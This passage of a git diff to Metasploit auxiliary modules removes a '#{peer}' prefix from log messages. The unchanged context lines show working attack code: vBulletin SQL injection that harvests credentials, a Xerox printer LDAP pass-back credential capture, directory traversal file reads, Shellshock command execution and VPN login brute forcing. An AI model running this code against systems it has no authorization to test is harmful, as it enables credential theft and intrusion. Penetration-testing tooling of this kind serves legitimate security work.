print_status("#{peer} - Beginning tests using #{datastore['TYPE']} search method (#{datastore['Threads']} Threads)") + print_status("Beginning tests using #{datastore['TYPE']} search method (#{datastore['Threads']} Threads)") test_length = 1 # initial test length set until @test_queue.empty? @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Auxiliary # provide feedback to user on current test length if datastore['DICT'].blank? and test_current.length > test_length test_length = test_current.length - print_status("#{peer} - Beginning bruteforce test for #{test_length} character strings") + print_status("Beginning bruteforce test for #{test_length} character strings") end res = make_request(test_current) @@ -178,11 +178,11 @@ class Metasploit3 < Msf::Auxiliary if res.nil? and not @retries.include?(test_current) # attempt test again as the server was too busy to respond # correctly - error returned - print_error("#{peer} - Error reading JSON response, attempting to redo check for \"#{test_current}\"") + print_error("Error reading JSON response, attempting to redo check for \"#{test_current}\"") @test_queue.push(test_current) @retries << test_current if @retries.length == 10 - print_error("#{peer} - Excessive number of retries detected (#{@retries.length}... check the TIMING and Threads options)") + print_error("Excessive number of retries detected (#{@retries.length}... check the TIMING and Threads options)") end elsif res # check response for user data @@ -242,11 +242,11 @@ class Metasploit3 < Msf::Auxiliary unless @user_data.flatten.include?(userinfo['uid']) @user_data << [ userinfo['uid'], userinfo['mail'] || "-", userinfo['externalName'] || "-" ] # print newly discovered users straight to the screen if verbose mode is set - vprint_good("#{peer} - New user found: #{userinfo['uid']}") + vprint_good("New user found: #{userinfo['uid']}") report_user(userinfo['uid']) end rescue JSON::ParserError - print_error("#{peer} - Error reading JSON string, continuing") + print_error("Error reading JSON string, continuing") end end @@ -263,7 +263,7 @@ class Metasploit3 < Msf::Auxiliary @test_queue.push(test_current + char) end elsif @depth_warning and test_current.length == datastore['MAXDEPTH'] and datastore['MAXDEPTH'] > 1 - vprint_status("#{peer} - Depth limit reached [#{datastore['MAXDEPTH']} levels deep] finishing up current tests") + vprint_status("Depth limit reached [#{datastore['MAXDEPTH']} levels deep] finishing up current tests") @depth_warning = false end end @@ -301,10 +301,10 @@ class Metasploit3 < Msf::Auxiliary end if not user_tbl.to_s.empty? - print_good("#{peer} - #{@user_data.length} users extracted") + print_good("#{@user_data.length} users extracted") print_line(user_tbl.to_s) else - print_error("#{peer} - No users discovered") + print_error("No users discovered") end end diff --git a/modules/auxiliary/gather/ibm_sametime_room_brute.rb b/modules/auxiliary/gather/ibm_sametime_room_brute.rb index dd0520d430..07cf026d44 100644 --- a/modules/auxiliary/gather/ibm_sametime_room_brute.rb +++ b/modules/auxiliary/gather/ibm_sametime_room_brute.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Beginning IBM Lotus Notes Sametime Meeting Room Bruteforce") + print_status("Beginning IBM Lotus Notes Sametime Meeting Room Bruteforce") print_status("Using owner: #{datastore['OWNER']}") # test for expected response code on non-existant meeting room name @@ -71,14 +71,14 @@ class Metasploit3 < Msf::Auxiliary }) unless res - print_error("#{peer} - No response, timeout") + print_error("No response, timeout") return end if res.code == 404 and res.body =~ /Room does not exist/i - vprint_status("#{peer} - Server responding to restapi requests as expected") + vprint_status("Server responding to restapi requests as expected") else - print_error("#{peer} - Unexpected response from server (#{res.code}). Exiting...") + print_error("Unexpected response from server (#{res.code}). Exiting...") return end @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary ::File.open(datastore['DICT']).each { |line| @test_queue.push(line.chomp) } vprint_status("Loaded #{@test_queue.length} values from dictionary") - print_status("#{peer} - Beginning dictionary bruteforce using (#{datastore['Threads']} Threads)") + print_status("Beginning dictionary bruteforce using (#{datastore['Threads']} Threads)") while(not @test_queue.empty?) t = [] @@ -108,9 +108,9 @@ class Metasploit3 < Msf::Auxiliary Thread.current.kill if not test_current res = make_request(test_current) if res.nil? - print_error("#{peer} - Timeout from server when testing room \"#{test_current}\"") + print_error("Timeout from server when testing room \"#{test_current}\"") elsif res and res.code == 404 - vprint_status("#{peer} - Room \"#{test_current}\" was not valid for owner #{datastore['OWNER']}") + vprint_status("Room \"#{test_current}\" was not valid for owner #{datastore['OWNER']}") else # check response for user data check_response(res, test_current) diff --git a/modules/auxiliary/gather/ibm_sametime_version.rb b/modules/auxiliary/gather/ibm_sametime_version.rb index 59db20b9a3..d9ea98a4e6 100644 --- a/modules/auxiliary/gather/ibm_sametime_version.rb +++ b/modules/auxiliary/gather/ibm_sametime_version.rb @@ -192,10 +192,10 @@ class Metasploit3 < Msf::Auxiliary def report if @version_info['version']['sametimeVersion'] print_line - print_good("#{peer} - #{@version_info['version']['sametimeVersion']} Detected") + print_good("#{@version_info['version']['sametimeVersion']} Detected") else print_line - print_status("#{peer} - IBM Lotus Sametime information") + print_status("IBM Lotus Sametime information") end # configure tables @@ -298,7 +298,7 @@ class Metasploit3 < Msf::Auxiliary @version_info['conf'] = {} @version_info['api'] = {} - print_status("#{peer} - Checking IBM Lotus Sametime Server") + print_status("Checking IBM Lotus Sametime Server") URLS.each do | url | check_url(url) end @@ -312,13 +312,13 @@ class Metasploit3 < Msf::Auxiliary proxy = URI(@version_info['conf']['meetingroomcenter.stProxyAddress']).host end - print_good("#{peer} - Sametime Proxy address discovered #{proxy}") + print_good("Sametime Proxy address discovered #{proxy}") PROXY_URLS.each do | url | check_url(url, proxy) end elsif proxy? - print_status("#{peer} - Sametime Proxy address discovered, but checks disabled") + print_status("Sametime Proxy address discovered, but checks disabled") end report unless @version_info.empty? diff --git a/modules/auxiliary/gather/java_rmi_registry.rb b/modules/auxiliary/gather/java_rmi_registry.rb index d6ddc26305..b16a028b08 100644 --- a/modules/auxiliary/gather/java_rmi_registry.rb +++ b/modules/auxiliary/gather/java_rmi_registry.rb @@ -34,53 +34,53 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") connect send_header ack = recv_protocol_ack if ack.nil? - print_error("#{peer} - Failed to negotiate RMI protocol") + print_error("Failed to negotiate RMI protocol") disconnect return end - print_status("#{peer} - Listing names in the Registry...") + print_status("Listing names in the Registry...") begin names = send_registry_list rescue ::Rex::Proto::Rmi::Exception => e - print_error("#{peer} - List raised exception #{e.message}") + print_error("List raised exception #{e.message}") return end if names.nil? - print_error("#{peer} - Failed to list names") + print_error("Failed to list names") return end if names.empty? - print_error("#{peer} - Names not found in the Registry") + print_error("Names not found in the Registry") return end - print_good("#{peer} - #{names.length} names found in the Registry") + print_good("#{names.length} names found in the Registry") names.each do |name| begin remote_reference = send_registry_lookup(name: name) rescue ::Rex::Proto::Rmi::Exception => e - print_error("#{peer} - Lookup of #{name} raised exception #{e.message}") + print_error("Lookup of #{name} raised exception #{e.message}") next end if remote_reference.nil? - print_error("#{peer} - Failed to lookup #{name}") + print_error("Failed to lookup #{name}") next end - print_good("#{peer} - Name #{name} (#{remote_reference[:object]}) found on #{remote_reference[:address]}:#{remote_reference[:port]}") + print_good("Name #{name} (#{remote_reference[:object]}) found on #{remote_reference[:address]}:#{remote_reference[:port]}") report_service( :host => remote_reference[:address], :port => remote_reference[:port], diff --git a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb index 4f43207091..27092ab4f4 100644 --- a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb +++ b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => '<SOAP-ENV:Envelope></SOAP-ENV:Envelope>' }, datastore['TIMEOUT'].to_i) if response.nil? - print_error("#{peer} - No reponse from device") + print_error("No reponse from device") return else xml0_body = ::Nokogiri::XML(response.body) @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionError - print_error("#{peer} - Version check Connection failed.") + print_error("Version check Connection failed.") end # This section logs on and retrieves AuthKey token @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => authreq_xml.to_xml }, datastore['TIMEOUT'].to_i) if response.nil? - print_error("#{peer} - No reponse from device") + print_error("No reponse from device") return else xml1_body = ::Nokogiri::XML(response.body) @@ -167,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary extract(major, minor, authkey) end rescue ::Rex::ConnectionError - print_error("#{peer} - Login Connection failed.") + print_error("Login Connection failed.") end end @@ -185,7 +185,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => smbreq_xml.to_xml }, datastore['TIMEOUT'].to_i) if response.nil? - print_error("#{peer} - No reponse from device") + print_error("No reponse from device") return else xml2_body = ::Nokogiri::XML(response.body) diff --git a/modules/auxiliary/gather/memcached_extractor.rb b/modules/auxiliary/gather/memcached_extractor.rb index 2aa7fee13d..72df26dd36 100644 --- a/modules/auxiliary/gather/memcached_extractor.rb +++ b/modules/auxiliary/gather/memcached_extractor.rb @@ -111,11 +111,11 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) peer = "#{ip}:#{rport}" - vprint_status("#{peer} - Connecting to memcached server...") + vprint_status("Connecting to memcached server...") begin connect if (version = determine_version) - vprint_good("#{peer} - Connected to memcached version #{version}") + vprint_good("Connected to memcached version #{version}") unless localhost?(ip) report_service( host: ip, @@ -126,11 +126,11 @@ class Metasploit3 < Msf::Auxiliary ) end else - print_error("#{peer} - unable to determine memcached protocol version") + print_error("unable to determine memcached protocol version") return end keys = enumerate_keys - print_good("#{peer} - Found #{keys.size} keys") + print_good("Found #{keys.size} keys") return if keys.size == 0 data = data_for_keys(keys) @@ -144,10 +144,10 @@ class Metasploit3 < Msf::Auxiliary print_line("#{result_table}") unless localhost?(ip) path = store_loot('memcached.dump', 'text/plain', ip, data, 'memcached.txt', 'Memcached extractor') - print_good("#{peer} - memcached loot stored at #{path}") + print_good("memcached loot stored at #{path}") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout - vprint_error("#{peer} - Could not connect to memcached server!") + vprint_error("Could not connect to memcached server!") end end end diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index f9e6328ab0..394b1facdf 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary # Check forum MyBB if res.body.match("MYBB") - print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}") + print_good("MyBB forum found running on #{web_server} / #{php_version}") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown @@ -77,13 +77,13 @@ class Metasploit3 < Msf::Auxiliary def run - print_status("#{peer} - Checking MyBB...") + print_status("Checking MyBB...") unless check == Exploit::CheckCode::Detected - print_error("#{peer} - MyBB not found") + print_error("MyBB not found") return end - print_status("#{peer} - Checking database...") + print_status("Checking database...") uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { @@ -94,17 +94,17 @@ class Metasploit3 < Msf::Auxiliary } }) if response.nil? - print_error("#{peer} - Timeout...") + print_error("Timeout...") return end # Resolve response if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("#{peer} - Running PostgreSQL Database") + print_good("Running PostgreSQL Database") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("#{peer} - Running SQLite Database") + print_good("Running SQLite Database") else - print_status("#{peer} - Running MySQL or unknown database") + print_status("Running MySQL or unknown database") end end end diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb index dbc12f74fc..d7de619453 100644 --- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb +++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary max = datastore["MAXNODE"] if min > max - print_error("#{peer} - MINNODE can't be major than MAXNODE") + print_error("MINNODE can't be major than MAXNODE") return nil end @@ -77,11 +77,11 @@ class Metasploit3 < Msf::Auxiliary def get_node if datastore['NODE'].nil? or datastore['NODE'] <= 0 - print_status("#{peer} - Brute forcing to find a valid node id...") + print_status("Brute forcing to find a valid node id...") return brute_force_node end - print_status("#{peer} - Checking node id #{datastore['NODE']}...") + print_status("Checking node id #{datastore['NODE']}...") if exists_node?(datastore['NODE']) return datastore['NODE'] else @@ -173,21 +173,21 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Checking for a valid node id...") + print_status("Checking for a valid node id...") node_id = get_node if node_id.nil? - print_error("#{peer} - node id not found") + print_error("node id not found") return end - print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...") + print_good("Using node id #{node_id} to exploit sqli... Counting users...") data = do_sqli(node_id, "select count(*) from user") if data.blank? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end count_users = data.to_i - print_good("#{peer} - #{count_users} users found. Collecting credentials...") + print_good("#{count_users} users found. Collecting credentials...") users_table = Rex::Ui::Text::Table.new( 'Header' => 'vBulletin Users', diff --git a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb index b06dd773c8..f3aed3ef04 100644 --- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb +++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Requesting website export...") + print_status("Requesting website export...") res = send_request_cgi( { 'method' => 'POST', @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary print_status("it does not allow WRITE permission to the all-in-one-wp-migration/storage directory.") else store_path = store_loot('wordpress.export', 'zip', datastore['RHOST'], res.body, 'wordpress_backup.zip', 'WordPress Database and Content Backup') - print_good("#{peer} - Backup archive saved to #{store_path}") + print_good("Backup archive saved to #{store_path}") end end end diff --git a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb index ebdc2ed1a7..d302309b70 100644 --- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb +++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary def process_row(row) if row[:user_login] && row[:user_pass] - print_good("#{peer} - Found credential: #{row[:user_login]}:#{row[:user_pass]}") + print_good("Found credential: #{row[:user_login]}:#{row[:user_pass]}") credential_data = { origin_type: :service, @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Requesting CSV extract...") + print_status("Requesting CSV extract...") res = send_request_cgi( 'method' => 'POST', 'uri' => exporter_url, @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Parsing response...") + print_status("Parsing response...") unless parse_csv(res.body, ',') unless parse_csv(res.body, ';') fail_with(Failure::UnexpectedReply, "#{peer} - Failed to parse response, the CSV was invalid") @@ -105,6 +105,6 @@ class Metasploit3 < Msf::Auxiliary end store_path = store_loot('wordpress.users.export', 'csv', datastore['RHOST'], res.body, 'users_export.csv', 'WordPress User Table Extract') - print_good("#{peer} - CSV saved to #{store_path}") + print_good("CSV saved to #{store_path}") end end diff --git a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb index 86fb68d333..bc8354c347 100644 --- a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb +++ b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb @@ -37,11 +37,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Attempting to extract LDAP username and password...") + print_status("Attempting to extract LDAP username and password...") @auth_cookie = default_page if @auth_cookie.blank? - print_status("#{peer} - Unable to get authentication cookie from #{rhost}") + print_status("Unable to get authentication cookie from #{rhost}") return end @@ -56,10 +56,10 @@ class Metasploit3 < Msf::Auxiliary start_listener unless @data - print_error("#{peer} - Failed to start listiner or the printer did not send us the creds. :(") + print_error("Failed to start listiner or the printer did not send us the creds. :(") status = restore_ldap_server unless status - print_error("#{peer} - Failed to restore old LDAP server. Please manually restore") + print_error("Failed to restore old LDAP server. Please manually restore") end return end @@ -71,13 +71,13 @@ class Metasploit3 < Msf::Auxiliary ldap_creds = "#{ldap_binary_creds[0]}:#{ldap_binary_creds[1]}" # Woot we got creds so lets save them.# - print_good("#{peer} - The following creds were capured: #{ldap_creds}") + print_good("The following creds were capured: #{ldap_creds}") loot_name = 'ldap.cp.creds' loot_type = 'text/plain' loot_filename = 'ldap-creds.text' loot_desc = 'LDAP Pass-back Harvester' p = store_loot(loot_name, loot_type, datastore['RHOST'], @data, loot_filename, loot_desc) - print_status("#{peer} - Credentials saved in: #{p}") + print_status("Credentials saved in: #{p}") register_creds('ldap', rhost, @ldap_port, ldap_binary_creds[0], ldap_binary_creds[1]) end @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary method = 'GET' res = make_request(page, method, '') if res.blank? || res.code != 200 - print_error("#{peer} - Failed to connect to #{rhost}. Please check the printers IP address.") + print_error("Failed to connect to #{rhost}. Please check the printers IP address.") return '' end res.get_cookies @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary res = make_request(login_page, method, login_post_data) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to login. Please check the password for the Administrator account") + print_error("Failed to login. Please check the password for the Administrator account") return nil end res.code @@ -126,9 +126,9 @@ class Metasploit3 < Msf::Auxiliary ldap_port_number = ldap_port_settings.scan(/valPrt_1\[2\] = (\d+)/).flatten @ldap_server = "#{ldap_server_ip[0]}.#{ldap_server_ip[1]}.#{ldap_server_ip[2]}.#{ldap_server_ip[3]}" @ldap_port = ldap_port_number[0] - print_status("#{peer} - LDAP server: #{@ldap_server}") + print_status("LDAP server: #{@ldap_server}") unless res.code == 200 || res.blank? - print_error("#{peer} - Failed to get LDAP data.") + print_error("Failed to get LDAP data.") return nil end res.code @@ -149,10 +149,10 @@ class Metasploit3 < Msf::Auxiliary ldap_update_post *= '&' method = 'POST' - print_status("#{peer} - Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}") + print_status("Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}") res = make_request(ldap_update_page, method, ldap_update_post) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to update LDAP server. Please check the host: #{rhost}") + print_error("Failed to update LDAP server. Please check the host: #{rhost}") return nil end res.code @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Auxiliary ldap_trigger_post *= '&' method = 'POST' - print_status("#{peer} - Triggering LDAP reqeust") + print_status("Triggering LDAP reqeust") res = make_request(ldap_trigger_page, method, ldap_trigger_post) res.code end @@ -243,10 +243,10 @@ class Metasploit3 < Msf::Auxiliary ldap_restore_post *= '&' method = 'POST' - print_status("#{peer} - Restoring LDAP server: #{@ldap_server}") + print_status("Restoring LDAP server: #{@ldap_server}") res = make_request(ldap_restore_page, method, ldap_restore_post) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to restore LDAP server: #{@ldap_server}. Please fix manually") + print_error("Failed to restore LDAP server: #{@ldap_server}. Please fix manually") return nil end res.code @@ -265,7 +265,7 @@ class Metasploit3 < Msf::Auxiliary }, datastore['TIMEOUT'].to_i) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - print_error("#{peer} - Connection failed.") + print_error("Connection failed.") end res diff --git a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb index 9e36f7fd21..d7242a5e71 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary temp = JSON.parse(res.body) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end @@ -64,9 +64,9 @@ class Metasploit3 < Msf::Auxiliary 'CouchDB Enum' ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Unable to enum, received \"#{res.code}\"") + print_error("Unable to enum, received \"#{res.code}\"") end end end diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb index 1dca83d949..0fc0fd14c0 100644 --- a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb @@ -32,14 +32,14 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Querying indices...") + vprint_status("Querying indices...") begin res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable - vprint_error("#{peer} - Unable to establish connection") + vprint_error("Unable to establish connection") return end @@ -47,11 +47,11 @@ class Metasploit3 < Msf::Auxiliary begin json_body = JSON.parse(res.body) rescue JSON::ParserError - vprint_error("#{peer} - Unable to parse JSON") + vprint_error("Unable to parse JSON") return end else - vprint_error("#{peer} - Timeout or unexpected response...") + vprint_error("Timeout or unexpected response...") return end @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary end if indices.length > 0 - print_good("#{peer} - ElasticSearch Indices found: #{indices.join(", ")}") + print_good("ElasticSearch Indices found: #{indices.join(", ")}") end end diff --git a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb index 6f80a86707..82e6fbb881 100644 --- a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" fname = datastore['FILE'] - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 500 and res.body =~ /Error report/ - vprint_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") + vprint_error("Cannot obtain '#{fname}', here are some possible reasons:") vprint_error("\t1. File does not exist.") vprint_error("\t2. The server does not have any patches deployed.") vprint_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -88,11 +88,11 @@ class Metasploit3 < Msf::Auxiliary fname ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") elsif res and res.code == 404 and res.body.to_s =~ /The requested URL.*was not found/ - vprint_error("#{peer} - File not found. Check FILE.") + vprint_error("File not found. Check FILE.") else - vprint_error("#{peer} - Fail to obtain file for some unknown reason") + vprint_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index 6c0b87c217..d7add8ec02 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb @@ -93,7 +93,7 @@ class Metasploit4 < Msf::Auxiliary res = req(datastore['CMD'], datastore['CVE']) if res && res.body =~ /#{marker}(.+)#{marker}/m - print_good("#{peer} - #{$1}") + print_good("#{$1}") report_vuln( :host => ip, :port => rport, diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index 21e93ce9b1..dbaf72cd7e 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary fname = datastore['FILE'] fname = fname[1, fname.length] if fname =~ /^\// - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -65,13 +65,13 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /failed to open stream\: No such file/ - print_error("#{peer} - Cannot read '#{fname}'. File does not exist.") + print_error("Cannot read '#{fname}'. File does not exist.") elsif res and res.code == 200 and res.body =~ /failed to open stream\: Permission denied/ - print_error("#{peer} - Cannot read '#{fname}'. Permission denied.") + print_error("Cannot read '#{fname}'. Permission denied.") elsif res and res.code == 200 and res.body =~ /Failed opening required/ - print_error("#{peer} - Cannot read '#{fname}'. Possibly not vulnerable.") + print_error("Cannot read '#{fname}'. Possibly not vulnerable.") elsif res and res.code == 200 data = res.body @@ -86,10 +86,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{datastore['FILE']} stored as '#{p}'") + print_good("#{datastore['FILE']} stored as '#{p}'") else - print_error("#{peer} - Request failed due to some unknown reason") + print_error("Request failed due to some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb index f9c8611e68..0264d5b855 100644 --- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb +++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb @@ -38,18 +38,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? - print_error("#{peer} - Connection failed, Aborting...") + print_error("Connection failed, Aborting...") return end unless is_app_asdm? - print_error("#{peer} - Application does not appear to be Cisco ASA ASDM. Module will not continue.") + print_error("Application does not appear to be Cisco ASA ASDM. Module will not continue.") return end - print_status("#{peer} - Application appears to be Cisco ASA ASDM. Module will continue.") + print_status("Application appears to be Cisco ASA ASDM. Module will continue.") - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => '/', 'method' => 'GET' }) - print_good("#{peer} - Server is responsive...") + print_good("Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE return end @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi({ 'uri' => '/+webvpn+/index.html', @@ -138,17 +138,17 @@ class Metasploit3 < Msf::Auxiliary res.body.match(/Success/) && res.body.match(/success/) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - print_error("#{peer} - HTTP Connection Failed, Aborting") + print_error("HTTP Connection Failed, Aborting") return :abort end end diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 5ad7ed6458..0a1537b49f 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -42,28 +42,28 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? - vprint_error("#{peer} - Connection failed, Aborting...") + vprint_error("Connection failed, Aborting...") return false end unless is_app_ssl_vpn? - vprint_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.") + vprint_error("Application does not appear to be Cisco SSL VPN. Module will not continue.") return false end - vprint_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.") + vprint_good("Application appears to be Cisco SSL VPN. Module will continue.") groups = Set.new if datastore['GROUP'].empty? - vprint_status("#{peer} - Attempt to Enumerate VPN Groups...") + vprint_status("Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups if groups.empty? - vprint_warning("#{peer} - Unable to enumerate groups") - vprint_warning("#{peer} - Using the default group: DefaultWEBVPNGroup") + vprint_warning("Unable to enumerate groups") + vprint_warning("Using the default group: DefaultWEBVPNGroup") groups << "DefaultWEBVPNGroup" else - vprint_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") + vprint_good("Enumerated VPN Groups: #{groups.to_a.join(", ")}") end else @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary end groups << "" - vprint_status("#{peer} - Starting login brute force...") + vprint_status("Starting login brute force...") groups.each do |group| each_user_pass do |user, pass| do_login(user, pass, group) @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary def check_conn? begin res = send_request_cgi('uri' => '/', 'method' => 'GET') - vprint_good("#{peer} - Server is responsive...") + vprint_good("Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, @@ -187,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page def do_login(user, pass, group) - vprint_status("#{peer} - Trying username:#{user.inspect} with 